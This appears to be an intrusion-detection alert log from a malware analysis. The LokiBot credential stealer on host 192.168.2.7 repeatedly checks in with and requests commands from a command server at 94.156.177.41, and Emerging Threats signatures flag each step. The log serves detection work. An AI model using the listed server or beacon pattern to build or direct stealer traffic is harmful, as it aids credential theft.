                            2024-11-28T09:14:25.137665+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74971694.156.177.4180TCP
                            2024-11-28T09:14:25.257595+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749716TCP
                            2024-11-28T09:14:25.519659+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74972294.156.177.4180TCP
                            2024-11-28T09:14:25.519659+01002025381ET MALWARE LokiBot Checkin1192.168.2.74972294.156.177.4180TCP
                            2024-11-28T09:14:25.519659+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74972294.156.177.4180TCP
                            2024-11-28T09:14:27.269118+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74972294.156.177.4180TCP
                            2024-11-28T09:14:27.269118+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74972294.156.177.4180TCP
                            2024-11-28T09:14:27.389087+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749722TCP
                            2024-11-28T09:14:27.668725+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74973094.156.177.4180TCP
                            2024-11-28T09:14:27.668725+01002025381ET MALWARE LokiBot Checkin1192.168.2.74973094.156.177.4180TCP
                            2024-11-28T09:14:27.668725+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74973094.156.177.4180TCP
                            2024-11-28T09:14:28.997689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74973094.156.177.4180TCP
                            2024-11-28T09:14:28.997689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74973094.156.177.4180TCP
                            2024-11-28T09:14:29.117592+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749730TCP
                            2024-11-28T09:14:29.385370+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74973394.156.177.4180TCP
                            2024-11-28T09:14:29.385370+01002025381ET MALWARE LokiBot Checkin1192.168.2.74973394.156.177.4180TCP
                            2024-11-28T09:14:29.385370+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74973394.156.177.4180TCP
                            2024-11-28T09:14:30.852920+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74973394.156.177.4180TCP
                            2024-11-28T09:14:30.852920+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74973394.156.177.4180TCP
                            2024-11-28T09:14:30.973009+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749733TCP
                            2024-11-28T09:14:31.235320+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74973994.156.177.4180TCP
                            2024-11-28T09:14:31.235320+01002025381ET MALWARE LokiBot Checkin1192.168.2.74973994.156.177.4180TCP
                            2024-11-28T09:14:31.235320+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74973994.156.177.4180TCP
                            2024-11-28T09:14:32.658743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74973994.156.177.4180TCP
                            2024-11-28T09:14:32.658743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74973994.156.177.4180TCP
                            2024-11-28T09:14:32.778682+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749739TCP
                            2024-11-28T09:14:33.051469+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74974594.156.177.4180TCP
                            2024-11-28T09:14:33.051469+01002025381ET MALWARE LokiBot Checkin1192.168.2.74974594.156.177.4180TCP
                            2024-11-28T09:14:33.051469+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74974594.156.177.4180TCP
                            2024-11-28T09:14:34.411968+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74974594.156.177.4180TCP
                            2024-11-28T09:14:34.411968+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74974594.156.177.4180TCP
                            2024-11-28T09:14:34.531967+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749745TCP
                            2024-11-28T09:14:34.797317+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74975094.156.177.4180TCP
                            2024-11-28T09:14:34.797317+01002025381ET MALWARE LokiBot Checkin1192.168.2.74975094.156.177.4180TCP
                            2024-11-28T09:14:34.797317+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74975094.156.177.4180TCP
                            2024-11-28T09:14:36.257830+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74975094.156.177.4180TCP
                            2024-11-28T09:14:36.257830+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74975094.156.177.4180TCP
                            2024-11-28T09:14:36.377840+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749750TCP
                            2024-11-28T09:14:36.663456+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74975594.156.177.4180TCP
                            2024-11-28T09:14:36.663456+01002025381ET MALWARE LokiBot Checkin1192.168.2.74975594.156.177.4180TCP
                            2024-11-28T09:14:36.663456+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74975594.156.177.4180TCP
                            2024-11-28T09:14:38.125230+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74975594.156.177.4180TCP
                            2024-11-28T09:14:38.125230+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74975594.156.177.4180TCP
                            2024-11-28T09:14:38.246285+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749755TCP
                            2024-11-28T09:14:38.518570+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74976094.156.177.4180TCP
                            2024-11-28T09:14:38.518570+01002025381ET MALWARE LokiBot Checkin1192.168.2.74976094.156.177.4180TCP
                            2024-11-28T09:14:38.518570+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74976094.156.177.4180TCP
                            2024-11-28T09:14:39.946419+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74976094.156.177.4180TCP
                            2024-11-28T09:14:39.946419+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74976094.156.177.4180TCP
                            2024-11-28T09:14:40.066664+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749760TCP
                            2024-11-28T09:14:40.330195+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74976494.156.177.4180TCP
                            2024-11-28T09:14:40.330195+01002025381ET MALWARE LokiBot Checkin1192.168.2.74976494.156.177.4180TCP
                            2024-11-28T09:14:40.330195+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74976494.156.177.4180TCP
                            2024-11-28T09:14:41.795444+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74976494.156.177.4180TCP
                            2024-11-28T09:14:41.795444+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74976494.156.177.4180TCP
                            2024-11-28T09:14:41.915448+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749764TCP
                            2024-11-28T09:14:42.534473+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74977094.156.177.4180TCP
                            2024-11-28T09:14:42.534473+01002025381ET MALWARE LokiBot Checkin1192.168.2.74977094.156.177.4180TCP
                            2024-11-28T09:14:42.534473+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74977094.156.177.4180TCP
                            2024-11-28T09:14:43.957647+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74977094.156.177.4180TCP
                            2024-11-28T09:14:43.957647+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74977094.156.177.4180TCP
                            2024-11-28T09:14:44.077722+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749770TCP
                            2024-11-28T09:14:44.345691+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74977594.156.177.4180TCP
                            2024-11-28T09:14:44.345691+01002025381ET MALWARE LokiBot Checkin1192.168.2.74977594.156.177.4180TCP
                            2024-11-28T09:14:44.345691+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74977594.156.177.4180TCP
                            2024-11-28T09:14:45.763443+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74977594.156.177.4180TCP
                            2024-11-28T09:14:45.763443+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74977594.156.177.4180TCP
                            2024-11-28T09:14:45.883417+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749775TCP
                            2024-11-28T09:14:46.159487+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74977994.156.177.4180TCP
                            2024-11-28T09:14:46.159487+01002025381ET MALWARE LokiBot Checkin1192.168.2.74977994.156.177.4180TCP
                            2024-11-28T09:14:46.159487+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74977994.156.177.4180TCP
                            2024-11-28T09:14:47.672120+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74977994.156.177.4180TCP
                            2024-11-28T09:14:47.672120+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74977994.156.177.4180TCP
                            2024-11-28T09:14:47.792085+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749779TCP
                            2024-11-28T09:14:48.063766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74978594.156.177.4180TCP
                            2024-11-28T09:14:48.063766+01002025381ET MALWARE LokiBot Checkin1192.168.2.74978594.156.177.4180TCP
                            2024-11-28T09:14:48.063766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74978594.156.177.4180TCP
                            2024-11-28T09:14:49.534406+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74978594.156.177.4180TCP
                            2024-11-28T09:14:49.534406+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74978594.156.177.4180TCP
                            2024-11-28T09:14:49.654366+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749785TCP
                            2024-11-28T09:14:49.922881+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74979194.156.177.4180TCP
                            2024-11-28T09:14:49.922881+01002025381ET MALWARE LokiBot Checkin1192.168.2.74979194.156.177.4180TCP
                            2024-11-28T09:14:49.922881+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74979194.156.177.4180TCP
                            2024-11-28T09:14:51.346606+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74979194.156.177.4180TCP
                            2024-11-28T09:14:51.346606+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74979194.156.177.4180TCP
                            2024-11-28T09:14:51.466613+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749791TCP
                            2024-11-28T09:14:51.737036+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74979594.156.177.4180TCP
                            2024-11-28T09:14:51.737036+01002025381ET MALWARE LokiBot Checkin1192.168.2.74979594.156.177.4180TCP
                            2024-11-28T09:14:51.737036+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74979594.156.177.4180TCP
                            2024-11-28T09:14:53.209909+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74979594.156.177.4180TCP
                            2024-11-28T09:14:53.209909+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74979594.156.177.4180TCP
                            2024-11-28T09:14:53.334685+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749795TCP
                            2024-11-28T09:14:53.691338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74979994.156.177.4180TCP
                            2024-11-28T09:14:53.691338+01002025381ET MALWARE LokiBot Checkin1192.168.2.74979994.156.177.4180TCP
                            2024-11-28T09:14:53.691338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74979994.156.177.4180TCP
                            2024-11-28T09:14:55.171476+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74979994.156.177.4180TCP
                            2024-11-28T09:14:55.171476+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74979994.156.177.4180TCP
                            2024-11-28T09:14:55.291439+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749799TCP
                            2024-11-28T09:14:55.562437+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74980494.156.177.4180TCP
                            2024-11-28T09:14:55.562437+01002025381ET MALWARE LokiBot Checkin1192.168.2.74980494.156.177.4180TCP
                            2024-11-28T09:14:55.562437+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74980494.156.177.4180TCP
                            2024-11-28T09:14:57.022105+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74980494.156.177.4180TCP
                            2024-11-28T09:14:57.022105+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74980494.156.177.4180TCP
                            2024-11-28T09:14:57.142377+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749804TCP
                            2024-11-28T09:14:57.414725+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74980894.156.177.4180TCP
                            2024-11-28T09:14:57.414725+01002025381ET MALWARE LokiBot Checkin1192.168.2.74980894.156.177.4180TCP
                            2024-11-28T09:14:57.414725+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74980894.156.177.4180TCP
                            2024-11-28T09:14:58.886053+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74980894.156.177.4180TCP
                            2024-11-28T09:14:58.886053+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74980894.156.177.4180TCP
                            2024-11-28T09:14:59.006862+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749808TCP
                            2024-11-28T09:14:59.272741+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74981494.156.177.4180TCP
                            2024-11-28T09:14:59.272741+01002025381ET MALWARE LokiBot Checkin1192.168.2.74981494.156.177.4180TCP
                            2024-11-28T09:14:59.272741+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74981494.156.177.4180TCP
                            2024-11-28T09:15:00.692482+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74981494.156.177.4180TCP
                            2024-11-28T09:15:00.692482+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74981494.156.177.4180TCP
                            2024-11-28T09:15:00.818473+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749814TCP
                            2024-11-28T09:15:01.091239+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74982094.156.177.4180TCP
                            2024-11-28T09:15:01.091239+01002025381ET MALWARE LokiBot Checkin1192.168.2.74982094.156.177.4180TCP
                            2024-11-28T09:15:01.091239+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74982094.156.177.4180TCP
                            2024-11-28T09:15:02.364424+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74982094.156.177.4180TCP
                            2024-11-28T09:15:02.364424+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74982094.156.177.4180TCP
                            2024-11-28T09:15:02.484511+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749820TCP
                            2024-11-28T09:15:02.750976+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74982394.156.177.4180TCP
                            2024-11-28T09:15:02.750976+01002025381ET MALWARE LokiBot Checkin1192.168.2.74982394.156.177.4180TCP
                            2024-11-28T09:15:02.750976+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74982394.156.177.4180TCP
                            2024-11-28T09:15:04.221399+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74982394.156.177.4180TCP
                            2024-11-28T09:15:04.221399+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74982394.156.177.4180TCP
                            2024-11-28T09:15:04.341290+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749823TCP
                            2024-11-28T09:15:04.611133+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74982994.156.177.4180TCP
                            2024-11-28T09:15:04.611133+01002025381ET MALWARE LokiBot Checkin1192.168.2.74982994.156.177.4180TCP
                            2024-11-28T09:15:04.611133+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74982994.156.177.4180TCP
                            2024-11-28T09:15:06.031420+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74982994.156.177.4180TCP
                            2024-11-28T09:15:06.031420+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74982994.156.177.4180TCP
                            2024-11-28T09:15:06.156297+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749829TCP
                            2024-11-28T09:15:06.425627+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74983394.156.177.4180TCP
                            2024-11-28T09:15:06.425627+01002025381ET MALWARE LokiBot Checkin1192.168.2.74983394.156.177.4180TCP
                            2024-11-28T09:15:06.425627+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74983394.156.177.4180TCP
                            2024-11-28T09:15:07.898325+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74983394.156.177.4180TCP
                            2024-11-28T09:15:07.898325+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74983394.156.177.4180TCP
                            2024-11-28T09:15:08.018341+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749833TCP
                            2024-11-28T09:15:08.283034+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74983994.156.177.4180TCP
                            2024-11-28T09:15:08.283034+01002025381ET MALWARE LokiBot Checkin1192.168.2.74983994.156.177.4180TCP
                            2024-11-28T09:15:08.283034+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74983994.156.177.4180TCP
                            2024-11-28T09:15:09.702160+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74983994.156.177.4180TCP
                            2024-11-28T09:15:09.702160+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74983994.156.177.4180TCP
                            2024-11-28T09:15:09.822079+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749839TCP
                            2024-11-28T09:15:10.092587+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74984494.156.177.4180TCP
                            2024-11-28T09:15:10.092587+01002025381ET MALWARE LokiBot Checkin1192.168.2.74984494.156.177.4180TCP
                            2024-11-28T09:15:10.092587+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74984494.156.177.4180TCP
                            2024-11-28T09:15:11.605394+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74984494.156.177.4180TCP
                            2024-11-28T09:15:11.605394+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74984494.156.177.4180TCP
                            2024-11-28T09:15:11.725316+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749844TCP
                            2024-11-28T09:15:11.986718+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74984994.156.177.4180TCP
                            2024-11-28T09:15:11.986718+01002025381ET MALWARE LokiBot Checkin1192.168.2.74984994.156.177.4180TCP
                            2024-11-28T09:15:11.986718+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74984994.156.177.4180TCP
                            2024-11-28T09:15:13.478183+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74984994.156.177.4180TCP
                            2024-11-28T09:15:13.478183+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74984994.156.177.4180TCP
                            2024-11-28T09:15:13.598708+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749849TCP
                            2024-11-28T09:15:13.869864+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74985494.156.177.4180TCP
                            2024-11-28T09:15:13.869864+01002025381ET MALWARE LokiBot Checkin1192.168.2.74985494.156.177.4180TCP
                            2024-11-28T09:15:13.869864+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74985494.156.177.4180TCP
                            2024-11-28T09:15:15.453442+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74985494.156.177.4180TCP
                            2024-11-28T09:15:15.453442+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74985494.156.177.4180TCP
                            2024-11-28T09:15:15.573387+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749854TCP
                            2024-11-28T09:15:15.847454+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74985994.156.177.4180TCP
                            2024-11-28T09:15:15.847454+01002025381ET MALWARE LokiBot Checkin1192.168.2.74985994.156.177.4180TCP
                            2024-11-28T09:15:15.847454+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74985994.156.177.4180TCP
                            2024-11-28T09:15:17.303515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74985994.156.177.4180TCP
                            2024-11-28T09:15:17.303515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74985994.156.177.4180TCP
                            2024-11-28T09:15:17.427062+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749859TCP
                            2024-11-28T09:15:17.771783+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74986494.156.177.4180TCP
                            2024-11-28T09:15:17.771783+01002025381ET MALWARE LokiBot Checkin1192.168.2.74986494.156.177.4180TCP
                            2024-11-28T09:15:17.771783+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74986494.156.177.4180TCP
                            2024-11-28T09:15:19.281950+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74986494.156.177.4180TCP
                            2024-11-28T09:15:19.281950+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74986494.156.177.4180TCP
                            2024-11-28T09:15:19.401939+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749864TCP
                            2024-11-28T09:15:19.671910+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74986994.156.177.4180TCP
                            2024-11-28T09:15:19.671910+01002025381ET MALWARE LokiBot Checkin1192.168.2.74986994.156.177.4180TCP
                            2024-11-28T09:15:19.671910+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74986994.156.177.4180TCP
                            2024-11-28T09:15:21.096193+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74986994.156.177.4180TCP
                            2024-11-28T09:15:21.096193+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74986994.156.177.4180TCP
                            2024-11-28T09:15:21.216237+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749869TCP
                            2024-11-28T09:15:21.490327+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74987494.156.177.4180TCP
                            2024-11-28T09:15:21.490327+01002025381ET MALWARE LokiBot Checkin1192.168.2.74987494.156.177.4180TCP
                            2024-11-28T09:15:21.490327+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74987494.156.177.4180TCP
                            2024-11-28T09:15:22.994413+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74987494.156.177.4180TCP
                            2024-11-28T09:15:22.994413+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74987494.156.177.4180TCP
                            2024-11-28T09:15:23.114781+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749874TCP
                            2024-11-28T09:15:23.380781+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74988094.156.177.4180TCP
                            2024-11-28T09:15:23.380781+01002025381ET MALWARE LokiBot Checkin1192.168.2.74988094.156.177.4180TCP
                            2024-11-28T09:15:23.380781+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74988094.156.177.4180TCP
                            2024-11-28T09:15:24.699039+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74988094.156.177.4180TCP
                            2024-11-28T09:15:24.699039+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74988094.156.177.4180TCP
                            2024-11-28T09:15:24.819027+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749880TCP
                            2024-11-28T09:15:25.077799+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74988594.156.177.4180TCP
                            2024-11-28T09:15:25.077799+01002025381ET MALWARE LokiBot Checkin1192.168.2.74988594.156.177.4180TCP
                            2024-11-28T09:15:25.077799+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74988594.156.177.4180TCP
                            2024-11-28T09:15:26.498742+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74988594.156.177.4180TCP
                            2024-11-28T09:15:26.498742+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74988594.156.177.4180TCP
                            2024-11-28T09:15:26.618766+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749885TCP
                            2024-11-28T09:15:26.899973+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74988994.156.177.4180TCP
                            2024-11-28T09:15:26.899973+01002025381ET MALWARE LokiBot Checkin1192.168.2.74988994.156.177.4180TCP
                            2024-11-28T09:15:26.899973+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74988994.156.177.4180TCP
                            2024-11-28T09:15:28.371147+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74988994.156.177.4180TCP
                            2024-11-28T09:15:28.371147+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74988994.156.177.4180TCP
                            2024-11-28T09:15:28.491168+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749889TCP
                            2024-11-28T09:15:28.747512+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74989394.156.177.4180TCP
                            2024-11-28T09:15:28.747512+01002025381ET MALWARE LokiBot Checkin1192.168.2.74989394.156.177.4180TCP
                            2024-11-28T09:15:28.747512+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74989394.156.177.4180TCP
                            2024-11-28T09:15:30.274220+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74989394.156.177.4180TCP
                            2024-11-28T09:15:30.274220+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74989394.156.177.4180TCP
                            2024-11-28T09:15:30.394237+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749893TCP
                            2024-11-28T09:15:30.655415+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74989894.156.177.4180TCP
                            2024-11-28T09:15:30.655415+01002025381ET MALWARE LokiBot Checkin1192.168.2.74989894.156.177.4180TCP
                            2024-11-28T09:15:30.655415+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74989894.156.177.4180TCP
                            2024-11-28T09:15:32.168060+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74989894.156.177.4180TCP
                            2024-11-28T09:15:32.168060+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74989894.156.177.4180TCP
                            2024-11-28T09:15:32.287996+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749898TCP
                            2024-11-28T09:15:32.556717+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74990394.156.177.4180TCP
                            2024-11-28T09:15:32.556717+01002025381ET MALWARE LokiBot Checkin1192.168.2.74990394.156.177.4180TCP
                            2024-11-28T09:15:32.556717+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74990394.156.177.4180TCP
                            2024-11-28T09:15:34.019143+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74990394.156.177.4180TCP
                            2024-11-28T09:15:34.019143+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74990394.156.177.4180TCP
                            2024-11-28T09:15:34.139340+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749903TCP
                            2024-11-28T09:15:34.408050+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.74990994.156.177.4180TCP
                            2024-11-28T09:15:34.408050+01002025381ET MALWARE LokiBot Checkin1192.168.2.74990994.156.177.4180TCP
                            2024-11-28T09:15:34.408050+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.74990994.156.177.4180TCP
                            2024-11-28T09:15:35.875260+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.74990994.156.177.4180TCP
                            2024-11-28T09:15:35.875260+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.74990994.156.177.4180TCP
                            2024-11-28T09:15:35.995187+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.749909TCP
